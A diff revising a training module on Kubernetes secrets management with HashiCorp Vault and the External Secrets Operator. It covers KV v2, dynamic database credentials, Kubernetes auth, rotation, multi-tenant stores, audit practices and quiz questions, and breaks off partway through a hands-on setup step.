-MULTI-TENANT SECRETS ARCHITECTURE
+VAULT ARCHITECTURE
 ════════════════════════════════════════════════════════════════════
 
 ┌─────────────────────────────────────────────────────────────────┐
-│                         VAULT                                    │
+│                         VAULT CLUSTER                            │
 │                                                                  │
-│  secret/                                                         │
-│  ├── team-a/                                                    │
-│  │   ├── app1/           ◀── team-a-policy                     │
-│  │   └── app2/                                                  │
-│  ├── team-b/                                                    │
-│  │   ├── api/            ◀── team-b-policy                     │
-│  │   └── worker/                                                │
-│  └── shared/                                                    │
-│      └── certificates/   ◀── shared-readonly                    │
-│                                                                  │
-└─────────────────────────────────────────────────────────────────┘
-                              │
-                              ▼
-┌─────────────────────────────────────────────────────────────────┐
-│                       KUBERNETES                                 │
-│                                                                  │
-│  ┌─────────────────┐  ┌─────────────────┐                      │
-│  │ Namespace:      │  │ Namespace:      │                      │
-│  │ team-a          │  │ team-b          │                      │
-│  │                 │  │                 │                      │
-│  │ SecretStore:    │  │ SecretStore:    │                      │
-│  │ vault-team-a    │  │ vault-team-b    │                      │
-│  │ (can only read  │  │ (can only read  │                      │
-│  │  team-a/*)      │  │  team-b/*)      │                      │
-│  └─────────────────┘  └─────────────────┘                      │
+│  ┌─────────────────────────────────────────────────────────┐   │
+│  │                    API / CLI                             │   │
+│  └─────────────────────┬───────────────────────────────────┘   │
+│                        │                                        │
+│  ┌─────────────────────▼───────────────────────────────────┐   │
+│  │                  AUTH METHODS                            │   │
+│  │  ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐       │   │
+│  │  │  K8s    │ │  OIDC   │ │  LDAP   │ │  Token  │       │   │
+│  │  └─────────┘ └─────────┘ └─────────┘ └─────────┘       │   │
+│  └─────────────────────────────────────────────────────────┘   │
+│                        │                                        │
+│  ┌─────────────────────▼───────────────────────────────────┐   │
+│  │                 SECRETS ENGINES                          │   │
+│  │  ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐       │   │
+│  │  │   KV    │ │Database │ │   PKI   │ │  AWS    │       │   │
+│  │  │(static) │ │(dynamic)│ │ (certs) │ │(dynamic)│       │   │
+│  │  └─────────┘ └─────────┘ └─────────┘ └─────────┘       │   │
+│  └─────────────────────────────────────────────────────────┘   │
+│                        │                                        │
+│  ┌─────────────────────▼───────────────────────────────────┐   │
+│  │                    STORAGE                               │   │
+│  │         Raft (integrated) / Consul / etcd               │   │
+│  └─────────────────────────────────────────────────────────┘   │
 │                                                                  │
 └─────────────────────────────────────────────────────────────────┘
 ```
 
-```yaml
-# Team A's SecretStore
-apiVersion: external-secrets.io/v1beta1
-kind: SecretStore
-metadata:
-  name: vault-team-a
-  namespace: team-a
-spec:
-  provider:
-    vault:
-      server: "https://vault.example.com"
-      path: "secret"
-      version: "v2"
-      auth:
-        kubernetes:
-          mountPath: "kubernetes"
-          role: "team-a"  # Vault role with team-a-policy
-          serviceAccountRef:
-            name: "vault-auth"
+### KV v2 for Static Material
+
+The **KV secrets engine version 2** adds versioning, soft-delete, and metadata paths separate from data paths. Static API keys, OAuth client secrets, and TLS bundles that change infrequently fit here. ESO reads logical keys; Vault retains version history so operators can roll back a bad update without restoring etcd snapshots. Versioning complements GitOps: the declared `ExternalSecret` stays stable while operators bump `remoteRef.version` when intentionally pinning.
+
+```bash
+vault kv put secret/myapp/config \
+  api_key="sk-xxx" \
+  db_password="hunter2"
+
+vault kv get secret/myapp/config
 ```
 
-### Shared Secrets Pattern
+Policies should grant **least privilege** per path prefix. A read-only application policy might allow `read` on `secret/data/myapp/*` and explicitly `deny` administrative paths.
 
-```yaml
-# ClusterSecretStore for shared secrets
-apiVersion: external-secrets.io/v1beta1
-kind: ClusterSecretStore
-metadata:
-  name: shared-secrets
-spec:
-  provider:
-    vault:
-      server: "https://vault.example.com"
-      path: "secret"
-      version: "v2"
-      auth:
-        kubernetes:
-          mountPath: "kubernetes"
-          role: "shared-readonly"
-          serviceAccountRef:
-            name: "external-secrets"
-            namespace: "external-secrets"
-  conditions:
-  # Only allow access from specific namespaces
-  - namespaces:
-    - production
-    - staging
+```hcl
+path "secret/data/myapp/*" {
+  capabilities = ["read", "list"]
+}
+
+path "secret/metadata/myapp/*" {
+  capabilities = ["list"]
+}
+
+path "secret/data/admin/*" {
+  capabilities = ["deny"]
+}
+```
+
+### Dynamic Secrets and Leases
+
+**Dynamic secrets** invert the static-password antipattern. Instead of one shared database user embedded in twelve Deployments, Vault's database engine creates a **unique role** with a **TTL** for each credential request. When the lease expires, Vault revokes the user automatically. If a pod logs a password or an attacker exfiltrates a file, the credential's scope is limited in time and often in privilege. This is why dynamic secrets reduce **blast radius** compared with long-lived KV passwords copied into clusters.
+
+```bash
+vault secrets enable database
+
+vault write database/config/postgres \
+  plugin_name=postgresql-database-plugin \
+  connection_url="postgresql://{{username}}:{{password}}@postgres:5432" \
+  allowed_roles="readonly" \
+  username="vault" \
+  password="vault-password"
+
+vault write database/roles/readonly \
+  db_name=postgres \
+  creation_statements="CREATE ROLE \"{{name}}\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; GRANT SELECT ON ALL TABLES IN SCHEMA public TO \"{{name}}\";" \
+  default_ttl="1h" \
+  max_ttl="24h"
+
+vault read database/creds/readonly
+```
+
+PKI and cloud engines follow the same lifecycle philosophy: **mint, use, expire, revoke**. ESO integrates through **generator** resources such as `VaultDynamicSecret` so Kubernetes-native Secrets can reflect periodically minted credentials where applications still consume env vars rather than files.
+
+The conceptual shift for application teams is subtle but important: **they no longer "own" a password**; they own **access to a role** that mints passwords. Onboarding documentation should describe Vault paths and Kubernetes service accounts, not shared credentials in wiki pages. Incident runbooks should include **lease revocation** commands and ESO resync steps rather than "ask DBA to reset the shared user again." That cultural move often determines whether dynamic secrets actually reduce risk or merely add moving parts.
+
 ---
-# Any namespace can use shared TLS certs
+
+## Kubernetes Authentication into Vault
+
+Long-lived Vault tokens stored in Git or baked into images recreate the sprawl you are trying to eliminate. **Kubernetes auth** binds Vault roles to **service account identity**: the pod (or ESO controller) presents a projected service account token; Vault validates it against the Kubernetes TokenReview API and returns a **short-lived Vault token** with attached policies.
+
+```bash
+vault auth enable kubernetes
+
+vault write auth/kubernetes/config \
+  kubernetes_host="https://kubernetes.default.svc" \
+  kubernetes_ca_cert=@/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
+
+vault write auth/kubernetes/role/myapp \
+  bound_service_account_names=myapp \
+  bound_service_account_namespaces=production \
+  audiences=vault \
+  policies=app-readonly \
+  ttl=1h
+```
+
+Modern Vault releases validate **`aud` claims** on projected tokens. Ensure the `audiences` field on the role matches the audience configured on the service account token projection used by ESO or your application. Mismatched audiences manifest as auth failures that look like intermittent network errors until you inspect Vault audit logs.
+
+For ESO specifically, the **`serviceAccountRef` on the SecretStore** determines which identity fetches secrets. Platform teams usually dedicate a service account per namespace or per tenant role, mapping one-to-one to Vault policies. Avoid reusing a cluster-admin-adjacent identity for secret retrieval; compromise of that token becomes total store read access.
+
+TokenReview failures often trace to **cluster API endpoint mismatches** when Vault runs outside the cluster but auth configuration still points at an internal URL reachable only from pods. Helm charts and Terraform modules frequently templatize `kubernetes_host`; verify the value from the Vault server's network perspective, not from your laptop. Rotating the Kubernetes CA requires updating Vault's auth config promptly or every ESO sync halts simultaneously—a classic platform-wide outage with a narrow fix window if playbooks omit CA rotation coupling.
+
+---
+
+## Rotation: KV Refresh versus Dynamic Generators
+
+Rotation strategy depends on whether the material is **static KV** or **engine-generated dynamic** credentials. Conflating the two leads to either stale passwords (KV synced too rarely) or excessive database churn (dynamic TTL shorter than connection pools tolerate).
+
+For KV secrets, **`refreshInterval` on `ExternalSecret`** controls how often ESO re-reads the backend and updates the native Secret. Critical credentials might reconcile every five to fifteen minutes; slow-changing TLS bundles might use twenty-four hours. Pair periodic sync with **Reloader** or a controlled rollout mechanism so applications pick up new values without manual pod deletion.
+
+```yaml
 apiVersion: external-secrets.io/v1beta1
 kind: ExternalSecret
 metadata:
-  name: wildcard-tls
-  namespace: production
+  name: rotating-db-creds
 spec:
-  refreshInterval: 24h
+  refreshInterval: 15m
   secretStoreRef:
-    name: shared-secrets
-    kind: ClusterSecretStore
+    name: vault-backend
+    kind: SecretStore
   target:
-    name: wildcard-tls
-    template:
-      type: kubernetes.io/tls
-  data:
-  - secretKey: tls.crt
-    remoteRef:
-      key: shared/certificates/wildcard
-      property: certificate
-  - secretKey: tls.key
-    remoteRef:
-      key: shared/certificates/wildcard
-      property: private_key
+    name: db-credentials
+    creationPolicy: Owner
+    deletionPolicy: Retain
+  dataFrom:
+  - sourceRef:
+      generatorRef:
+        apiVersion: generators.external-secrets.io/v1alpha1
+        kind: VaultDynamicSecret
+        name: dynamic-db-credentials
 ```
-
----
-
-## Secret Rotation
-
-### Automatic Rotation with Vault
-
-```bash
-# Enable database secrets engine
-vault secrets enable database
-
-# Configure PostgreSQL
-vault write database/config/mydb \
-  plugin_name=postgresql-database-plugin \
-  connection_url="postgresql://{{username}}:{{password}}@postgres:5432/mydb" \
-  allowed_roles="app" \
-  username="vault_admin" \
-  password="admin_password"
-
-# Create role with short TTL
-vault write database/roles/app \
-  db_name=mydb \
-  creation_statements="CREATE ROLE \"{{name}}\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; GRANT SELECT, INSERT, UPDATE ON ALL TABLES IN SCHEMA public TO \"{{name}}\";" \
-  default_ttl="1h" \
-  max_ttl="24h"
-```
-
-### Dynamic rotation with VaultDynamicSecret
 
 ```yaml
 apiVersion: generators.external-secrets.io/v1alpha1
@@ -562,40 +450,18 @@ spec:
         role: "external-secrets-operator"
         serviceAccountRef:
           name: "external-secrets"
----
-apiVersion: external-secrets.io/v1beta1
-kind: ExternalSecret
-metadata:
-  name: rotating-db-creds
-spec:
-  refreshInterval: 15m  # Sync every 15 minutes
-  secretStoreRef:
-    name: vault-backend
-    kind: SecretStore
-  target:
-    name: db-credentials
-    creationPolicy: Owner
-    deletionPolicy: Retain  # Keep secret if ExternalSecret deleted
-  dataFrom:
-  - sourceRef:
-      generatorRef:
-        apiVersion: generators.external-secrets.io/v1alpha1
-        kind: VaultDynamicSecret
-        name: dynamic-db-credentials
 ```
 
-Use a static `ExternalSecret` with `refreshInterval` for KV secrets (example: `myapp/config` from Vault KV). For Vault dynamic engines such as database credentials, AWS STS, or PKI, use `VaultDynamicSecret` generators so new values are minted per secret engine semantics rather than merely polling a static key.
+Use **`VaultDynamicSecret` generators** when the Vault path returns **new lease-bound credentials** each call—database, PKI, or cloud STS-style engines. Static KV paths should use `data`/`dataFrom` with `refreshInterval`, not generators, unless you intentionally re-fetch versioned keys.
 
-### Handling Rotation in Applications
+Applications that cache credentials in memory need explicit **rotation tolerance**: connection pools should recycle before TTL expiry, or sidecars should signal reload. For batch jobs, short TTL plus retry-on-auth-failure is often enough. For long-lived servers, coordinate TTL with `refreshInterval` and rolling restart annotations.
 
 ```yaml
-# Deployment that restarts on secret change
 apiVersion: apps/v1
 kind: Deployment
 metadata:
   name: myapp
   annotations:
-    # Reloader watches for secret changes
     reloader.stakater.com/auto: "true"
 spec:
   template:
@@ -607,13 +473,146 @@ spec:
             name: db-credentials
 ```
 
-```bash
-# Install Reloader for automatic restarts
-helm repo add stakater https://stakater.github.io/stakater-charts
-helm install reloader stakater/reloader -n kube-system
+Remember to **`vault write -force database/rotate-root/...`** on a schedule for the Vault admin connection itself—root database credentials are easy to forget because applications no longer use them directly after dynamic roles land.
+
+**Zero-downtime rotation** combines three levers: refresh cadence on the `ExternalSecret`, application tolerance for credential change, and orchestration that rolls pods without hard downtime. For stateless HTTP services, Reloader-triggered rolling updates are often sufficient. For connection pools, stagger refreshes so new credentials propagate before old leases expire, or set TTL slightly longer than two refresh intervals to absorb transient sync delays. Document the arithmetic explicitly in service runbooks so on-call engineers do not shorten TTL in panic during incidents and accidentally amplify outages.
+
+Database engines may also support **graceful revocation delays** configured in Vault roles; use them when applications cannot reconnect instantly. The goal is not the shortest possible TTL—it is the shortest TTL compatible with observed reconnect latency plus ESO reconcile time. Measure both before tightening production values copied from tutorial examples.
+
+---
+
+## Injection Paths: When Native Secrets Are Optional
+
+Not every workload must materialize a Kubernetes `Secret`. **Vault Agent Injector** mutating webhooks annotate pods to run an agent sidecar that authenticates and renders files under `/vault/secrets`. **Secrets Store CSI Driver** mounts volumes backed by provider plugins; the [Secrets Store CSI documentation](https://secrets-store-csi-driver.sigs.k8s.io/introduction) describes mount-time retrieval and optional sync-to-Secret behaviors. Choose injection when etcd confidentiality is paramount, when secrets are large keystores, or when you want per-pod identity without cluster-wide Secret objects.
+
+Injection trades operational complexity for narrower persistence: you must manage sidecar upgrades, ensure init order before application start, and verify node-level protections. Many teams use **ESO for mainstream app env vars** and **CSI or Agent for tier-zero keys**—a deliberate split documented in the Rosetta rather than a single global mandate.
+
+Sidecars also shift **failure modes**: if Vault is unavailable at pod start, the main container may never become ready, which is correct fail-closed behavior but requires SLO thinking on Vault itself. Health checks should distinguish "application broken" from "secret mount pending." For batch jobs, consider init-container-only agents that exit after rendering files so long-running sidecars do not inflate resource requests across thousands of CronJob pods.
+
+---
+
+## Multi-Tenant Secrets Patterns
+
+Shared Vault clusters commonly partition paths by team (`secret/team-a/...`, `secret/team-b/...`) and bind **Kubernetes auth roles** so each namespace's ESO identity can read only its prefix. **ClusterSecretStore** suits truly shared material—wildcard TLS, corporate CA bundles—while **SecretStore** keeps tenant credentials from sharing authentication paths that could be misconfigured into cross-tenant reads.
+
+```
+MULTI-TENANT SECRETS ARCHITECTURE
+════════════════════════════════════════════════════════════════════
+
+┌─────────────────────────────────────────────────────────────────┐
+│                         VAULT                                    │
+│  secret/                                                         │
+│  ├── team-a/  ◀── team-a-policy                                 │
+│  ├── team-b/  ◀── team-b-policy                                 │
+│  └── shared/certificates/  ◀── shared-readonly                  │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  Namespace team-a          │  Namespace team-b                  │
+│  SecretStore vault-team-a  │  SecretStore vault-team-b          │
+└─────────────────────────────────────────────────────────────────┘
 ```
 
-> 💡 **Did You Know?** The Stakater Reloader watches Secrets and ConfigMaps and automatically triggers rolling restarts when they change. This solves the "I updated the secret but pods still have old values" problem without requiring application code changes.
+```yaml
+apiVersion: external-secrets.io/v1beta1
+kind: SecretStore
+metadata:
+  name: vault-team-a
+  namespace: team-a
+spec:
+  provider:
+    vault:
+      server: "https://vault.example.com"
+      path: "secret"
+      version: "v2"
+      auth:
+        kubernetes:
+          mountPath: "kubernetes"
+          role: "team-a"
+          serviceAccountRef:
+            name: "vault-auth"
+```
+
+For shared TLS, a `ClusterSecretStore` plus namespace **conditions** prevents staging namespaces from pulling production certificates while still centralizing renewal in Vault PKI or a corporate CA workflow.
+
+Tenant onboarding checklists should include **path prefix conventions**, **Vault policy names**, **Kubernetes auth role names**, and **allowed service account names** as a single tuple verified in staging before production namespaces receive access. Drift happens when application teams create arbitrary service account names that no longer match `bound_service_account_names` on Vault roles; CI linting against allowed tuples catches most mistakes cheaper than weekend outages.
+
+---
+
+## Audit, Monitoring, and Emergency Revocation
+
+Centralized secrets management earns its keep during incidents. Enable Vault **audit devices** to record authenticated requests with path, operation, and identity metadata. Forward logs to your SIEM with retention aligned to compliance requirements. ESO controller logs complement Vault audit by showing reconcile errors, backoff behavior, and provider HTTP failures—correlate timestamps when users report "the app says login failed" after a Vault policy change.
+
+**Emergency revocation** has two layers: invalidate active **leases** for dynamic secrets (`vault lease revoke` or revoke-by-prefix operations where appropriate), and **disable or rotate static KV versions** when material may have leaked from etcd backups or CI logs. After revocation, force ESO reconcile by bumping an annotation or temporarily shortening `refreshInterval`; waiting passively for the next interval extends exposure when attackers already possess copied values. Communicate with application owners before mass revocation—fail-closed security helps only if teams expect credential death and have rehearsed reconnect behavior.
+
+Monitoring should include synthetic checks: a canary `ExternalSecret` in a platform namespace that reads a low-risk test key proves end-to-end health beyond "Vault UI loads." Alert on rising sync error rates per cluster and on Vault seal status changes. These signals catch network policy regressions and certificate rotations on Vault ingress long before application teams open tickets.
+
+Treat **secret consumption** as part of workload identity reviews the same way you review `ClusterRoleBindings`. During access recertification campaigns, export Vault audit samples for paths tied to each product line and compare against expected service account identities. Orphaned paths—still read monthly but owned by decommissioned namespaces—are debt that becomes incident fuel when forgotten credentials leak from old etcd backups. Automate path ownership tags in Vault metadata where possible so CI can fail when application repos disappear but secret paths remain.
+
+---
+
+## Patterns, Anti-Patterns, and Decision Framework
+
+### Patterns
+
+**Pattern: Git declares references, store holds values.** Commit `ExternalSecret` manifests and policy-as-code for Vault roles; never commit cleartext or long-lived root tokens. Reviewers can reason about blast radius because paths and namespaces are visible in diffs.
+
+**Pattern: One Vault role per ESO service account.** Map Kubernetes identity to narrowly scoped policies. When a namespace is compromised, attackers inherit only that role's paths—not the entire KV tree.
+
+**Pattern: Layer encryption at rest with RBAC least privilege.** Even with ESO, enable etcd encryption and restrict `get/list/watch` on Secrets. Defense in depth assumes etcd backups and control-plane access are realistic threats.
+
+**Pattern: Dual-run migrations.** Operate legacy Secrets and ESO-managed Secrets in parallel until `SecretSynced` is proven and applications validate connectivity. Only then retire manual objects—see the hypothetical scenario in **Why This Module Matters**.
+
+**Pattern: Version and pin intentionally.** KV v2 supports version pins in ESO when rolling out breaking secret shape changes; unpin after consumers migrate. Document pin duration in change tickets so security debt does not linger across quarters.
+
+**Pattern: Separate control plane and data plane credentials.** Vault unseal keys, cloud KMS credentials for auto-unseal, and ESO bootstrap tokens belong in break-glass procedures distinct from application database roles. Mixing them in one policy path guarantees over-privileged recovery runbooks.
+
+### Anti-Patterns
+
+**Anti-pattern: Root or admin tokens in CI.** Any token that can read `secret/*` or manage policies becomes a universal skeleton key. Use namespaced roles and short TTL tokens bound to workload identity.
+
+**Anti-pattern: Infinite TTL on dynamic roles "to reduce churn."** Defeating TTL removes the primary benefit of dynamic secrets and recreates shared-password incidents with extra steps.
+
+**Anti-pattern: ClusterSecretStore without namespace guards.** A cluster-wide store simplifies demos and creates cross-environment leakage when every namespace can reference the same backend role.
+
+**Anti-pattern: Skipping Vault audit devices.** Without audit logs, sync errors and unauthorized reads devolve into guesswork during incidents.
+
+**Anti-pattern: Logging secret values in ESO debug modes.** Temporary debug logging during troubleshooting sometimes exposes fetched material to centralized log stacks with longer retention than etcd. Disable debug flags explicitly in change tickets and verify log redaction policies with security before enabling verbose provider logs in production namespaces.
+
+### Decision Framework
+
+| Your constraint | Prefer | Why |
+|-----------------|--------|-----|
+| GitOps must stay plaintext-free with minimal new CRDs | Sealed Secrets or SOPS | Ciphertext in Git; cluster keys stay in cluster |
+| Existing apps only support `secretKeyRef` env vars | ESO + external store | Keeps pod contract; centralizes authority |
+| Must avoid native Secret in etcd entirely | Vault Agent or CSI driver | Mount-time delivery without Secret object |
+| Database creds rotate frequently; many consumers | Vault dynamic engine + ESO generator | Unique short-lived users; automatic revocation |
+| Multi-cloud portability with one controller | ESO with provider abstraction | Same CRDs; swap SecretStore provider stanza |
+| Strong OSI license requirement for backend | OpenBao + ESO Vault provider | MPL-licensed fork; verify compatibility matrix |
+
+```mermaid
+flowchart TD
+  A[Need secrets in Kubernetes] --> B{Can a native Secret exist in etcd?}
+  B -->|Yes| C{Need dynamic DB/PKI creds?}
+  B -->|No| D[CSI or Vault Agent injection]
+  C -->|KV/static| E[ESO ExternalSecret + refreshInterval]
+  C -->|Dynamic| F[ESO VaultDynamicSecret generator]
+  E --> G[Enable etcd encryption + tight RBAC]
+  F --> G
+  D --> H[Per-pod SA auth + short TTL]
+```
+
+---
+
+## Did You Know?
+
+- **Kubernetes encrypt-at-rest is cluster-wide, not per-Secret:** You enable it via `EncryptionConfiguration` and optional KMS providers; it protects etcd persistence but does not replace external lifecycle management—see the [Kubernetes encryption guide](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/).
+- **KV v2 keeps metadata even after delete:** Soft-delete and version history help rollback operator mistakes; ESO typically reads live versions unless you pin `remoteRef.version`.
+- **Vault dynamic database users are real SQL roles:** Each `vault read database/creds/...` issues a distinct username/password pair with `VALID UNTIL` aligned to lease TTL—revocation is explicit, not hopeful.
+- **ESO provider count exceeds Vault alone:** The same `ExternalSecret` shape can target cloud vendor APIs; migrations often change only the `SecretStore` provider stanza while Deployments stay untouched.
+
+The External Secrets project publishes provider-specific guides for each backend; treating those guides as part of your internal runbook set prevents teams from assuming AWS-only examples when your platform standardized on Vault paths and Kubernetes auth roles years ago. Revisit provider release notes quarterly because authentication defaults and CRD version bumps change more often than core Kubernetes APIs typically do in practice.
 
 ---
 
@@ -621,202 +620,188 @@ helm install reloader stakater/reloader -n kube-system
 
 | Mistake | Problem | Solution |
 |---------|---------|----------|
-| Storing Vault token in Git | Token exposed, full Vault access | Use Kubernetes auth method |
-| Long refresh intervals | Secrets out of sync for hours | Use 5-15m for critical secrets |
-| No audit logging | Can't track who accessed what | Enable Vault audit device |
-| Single Vault token for all apps | Blast radius too large | Per-app policies and tokens |
-| Forgetting to rotate root creds | Vault DB admin password may stay unchanged unless you rotate it | Use `vault write -force database/rotate-root/mydb` |
-| Not versioning KV secrets | Can't rollback bad changes | Use KV v2, check versions |
-
----
-
-## War Story: The Great Secret Migration
-
-*A platform team moved a large batch of Kubernetes Secrets to Vault+ESO during a staged migration. The transition initially caused partial outages because validation was rushed.*
-
-**What went wrong**: They deleted the old Kubernetes Secrets before verifying ESO had synced successfully. Several ExternalSecrets had typos in the `remoteRef.key` paths.
-
-**The fix**:
-1. Always run ESO alongside existing secrets first
-2. Verify each ExternalSecret shows `SecretSynced: True`
-3. Only delete old secrets after apps confirm they're working
-4. Use `kubectl get externalsecrets -A` to check sync status
-
-```bash
-# Verify all ExternalSecrets are synced
-kubectl get externalsecrets -A -o custom-columns=\
-'NAMESPACE:.metadata.namespace,NAME:.metadata.name,STATUS:.status.conditions[0].reason'
-```
+| Storing Vault root token in Git | Full administrative compromise | Bootstrap with recovery keys; use Kubernetes auth and scoped policies |
+| Using KV v1 paths with v2 provider config | Sync failures or empty keys | Set `version: "v2"` and use logical keys without `data/` prefix in ESO |
+| Long `refreshInterval` on rotated KV secrets | Pods run stale passwords for hours | Match interval to rotation SLO; add Reloader or rolling restarts |
+| Single shared Vault token for all namespaces | Massive blast radius on one leak | One Kubernetes auth role per tenant service account |
+| Deleting legacy Secrets before sync verified | Immediate application outage | Dual-run until `SecretSynced=True` and apps health-check |
+| Ignoring Vault audit devices | No forensic trail during incidents | Enable file or socket audit sinks with retention |
+| Forgetting database root rotation | Vault admin DB cred becomes static linchpin | Schedule `vault write -force database/rotate-root/...` |
+| Wrong projected token audience on K8s auth role | Auth succeeds in dev, fails in prod | Align `audiences` with service account token projection |
 
 ---
 
 ## Quiz
 
-### Question 1
-What's the advantage of Vault's dynamic database secrets over static passwords?
+**Question 1:** A junior engineer argues that Kubernetes Secrets are "encrypted" because values appear as base64 in YAML dumps. Explain why that belief is dangerous in production RBAC and backup models.
 
 <details>
-<summary>Show Answer</summary>
+<summary>Answer</summary>
 
-Dynamic secrets:
-1. **Unique per request** - Each application instance gets different credentials
-2. **Auto-expire** - Credentials have TTL, automatically revoked
-3. **Audit trail** - Know exactly which credential was used where
-4. **Breach isolation** - If leaked, you know which instance was compromised
-5. **No shared secrets** - No "one password everyone knows" problem
-
+Base64 is encoding for transport, not encryption. Anyone with RBAC read access to Secrets, etcd backup access, or compromised control-plane visibility can recover cleartext without breaking cryptography. Real protection requires restricting who can read Secret objects, encrypting etcd at rest with `EncryptionConfiguration`, and— for lifecycle needs—external stores with rotation, auditing, and least-privilege access paths rather than relying on the API object's obfuscation.
 </details>
 
-### Question 2
-When should you use ClusterSecretStore vs SecretStore?
+**Question 2:** When should you choose ESO with `VaultDynamicSecret` generators instead of a static KV `ExternalSecret` with `refreshInterval`?
 
 <details>
-<summary>Show Answer</summary>
+<summary>Answer</summary>
 
-**SecretStore** (namespaced):
-- Team/application specific secrets
-- Different auth per namespace
-- Isolation between tenants
-
-**ClusterSecretStore** (cluster-wide):
-- Shared secrets (TLS certs, CA bundles)
-- Central secret management
-- Use with `conditions.namespaces` to limit access
-
+Use `VaultDynamicSecret` when the Vault path represents a **dynamic engine**—database, PKI, or cloud—that mints **new lease-bound credentials** on each generation call. Use static KV sync with `refreshInterval` when values change occasionally but are not regenerated per request. Conflating the two yields either stale passwords (KV synced too rarely) or excessive database user churn (dynamic TTL shorter than connection pools tolerate). Match generator usage to engine semantics documented in Vault and ESO provider guides.
 </details>
 
-### Question 3
-An ExternalSecret shows `SecretSyncedError`. How do you debug it?
+**Question 3:** During a deployment freeze, several namespaces report `SecretSyncedError` on new ExternalSecrets while older ones keep working. Describe a step-by-step investigation that separates Vault policy regressions from ESO misconfiguration.
 
 <details>
-<summary>Show Answer</summary>
+<summary>Answer</summary>
 
-```bash
-# 1. Check ExternalSecret status
-kubectl describe externalsecret <name>
-# Look at Status.Conditions and Events
+Start with `kubectl describe externalsecret` for status conditions and events, then inspect ESO controller logs in the install namespace. Verify the referenced `SecretStore` or `ClusterSecretStore` shows valid connectivity and that Kubernetes auth audiences match the service account projection. Confirm Vault policy allows read on the intended path and that `remoteRef.key` uses the KV v2 logical name (for example `production/database`, not `secret/data/production/database`). Network policies blocking egress to Vault and expired tokens on the store's service account are frequent root causes in multi-namespace clusters.
+</details>
 
-# 2. Check ESO controller logs
-kubectl logs -n external-secrets -l app.kubernetes.io/name=external-secrets
+**Question 4:** Compare blast radius of a shared static database password in KV versus Vault dynamic credentials for the same application tier.
 
-# 3. Verify SecretStore connection
-kubectl describe secretstore <store-name>
+<details>
+<summary>Answer</summary>
 
-# 4. Common causes:
-# - Wrong remoteRef key path (use `myapp/config`, not `secret/myapp` or `secret/data/myapp`)
-# - Auth issues (service account, role binding)
-# - Network (can ESO reach Vault?)
-# - Policy (does Vault policy allow read?)
-```
+A shared KV password reused across many Deployments means one leak grants persistent access until manual rotation completes, and you cannot tell which consumer was compromised. Dynamic credentials issue **unique users with TTL** per generation; leakage exposes only one lease window and one role's privileges. Revocation is automatic at lease end. Dynamic secrets add operational requirements—applications must handle rotation—but shrink both duration and scope of exposure, which is why dynamic engines pair well with ESO generators for data-tier access.
+</details>
 
+**Question 5:** Your security team forbids native Kubernetes Secrets in etcd for a payment service. Which pattern fits without abandoning Kubernetes scheduling?
+
+<details>
+<summary>Answer</summary>
+
+Use **Vault Agent Injector** or **Secrets Store CSI Driver** with the Vault provider to mount secrets as files or env sources at pod start without creating a persistent Secret object in etcd. Pair per-pod Kubernetes auth with short TTL Vault tokens. This trades sidecar or CSI operational complexity for reduced etcd persistence of cleartext. Many platforms still use ESO for less sensitive tiers while restricting injection to high-sensitivity workloads—document the split explicitly in architecture reviews.
+</details>
+
+**Question 6:** Platform leadership asks whether to standardize on one ClusterSecretStore for simplicity or many namespaced SecretStores per team. What criteria should drive that decision for database credentials versus organization-wide TLS bundles?
+
+<details>
+<summary>Answer</summary>
+
+Use **SecretStore** for tenant-scoped credentials where each namespace should authenticate with a distinct Vault role and path prefix—isolation failures stay namespace-bound. Use **ClusterSecretStore** for genuinely shared material such as organization-wide TLS bundles or CA certificates, combined with namespace **conditions** so only approved environments reference the store. Avoid cluster stores for application database credentials; the convenience of a single manifest often becomes cross-tenant leakage when conditions are forgotten during onboarding.
+</details>
+
+**Question 7:** Your team plans a weekend migration from manually created Secrets to ESO-managed Secrets for twelve production Deployments. Outline a dual-run cutover sequence that avoids the outage pattern described in the module's hypothetical scenario.
+
+<details>
+<summary>Answer</summary>
+
+Implement External Secrets Operator alongside existing Secrets: create `SecretStore` and `ExternalSecret` objects targeting **new** native Secret names or temporarily duplicate keys, verify `SecretSynced=True`, and run application connectivity tests against the ESO-managed Secret. Update Deployments to reference the new Secret only after validation. Retire manual Secrets last. Maintain a dashboard of sync status across namespaces (`kubectl get externalsecrets -A`) during the window. This implements the dual-run pattern and avoids the cutover failure mode where typos in `remoteRef.key` surface only after old Secrets were deleted.
+</details>
+
+**Question 8:** Security architecture review flags long-lived Vault tokens embedded in legacy Helm charts. Explain how Kubernetes auth into Vault plus ESO `serviceAccountRef` reduces sprawl compared with distributing static tokens to every namespace.
+
+<details>
+<summary>Answer</summary>
+
+Kubernetes auth binds Vault policies to **service account identity** validated through TokenReview, returning **short-lived Vault tokens** instead of embedding long-lived secrets in Git or images. ESO uses the same model via `serviceAccountRef` on SecretStore specs. Compromise of a pod yields only that role's paths and TTL—not a root token usable cluster-wide. Operators rotate and audit at Vault, while workloads never store bootstrap credentials in repositories, closing the loop between GitOps hygiene and runtime authentication.
 </details>
 
 ---
 
 ## Hands-On Exercise
 
-### Objective
-Set up Vault with Kubernetes auth and sync secrets using ESO.
+Set up Vault (dev or lab), install External Secrets Operator, and sync a KV secret into a native Kubernetes `Secret` using Kubernetes auth or token auth for lab simplicity.
 
 ### Environment Setup
 
 ```bash
-# Start local Vault in dev mode
 docker run -d --name vault \
   -p 8200:8200 \
   -e 'VAULT_DEV_ROOT_TOKEN_ID=root' \
   -e 'VAULT_DEV_LISTEN_ADDRESS=0.0.0.0:8200' \
   hashicorp/vault:latest
 
-export VAULT_ADDR='http://localhost:8200'
+export VAULT_ADDR='http://127.0.0.1:8200'
 export VAULT_TOKEN='root'
 
-# Create test secrets
 vault kv put secret/myapp/config \
   database_url="postgresql://user:pass@db:5432/mydb" \
   api_key="sk-test-12345"
 ```
 
-### Tasks
+Install ESO with the upstream Helm chart in a dedicated namespace so CRDs and controller RBAC remain isolated from application workloads.
 
-1. **Install ESO** in your cluster:
-   ```bash
-   helm install external-secrets external-secrets/external-secrets \
-     -n external-secrets --create-namespace
-   ```
+```bash
+helm install external-secrets external-secrets/external-secrets \
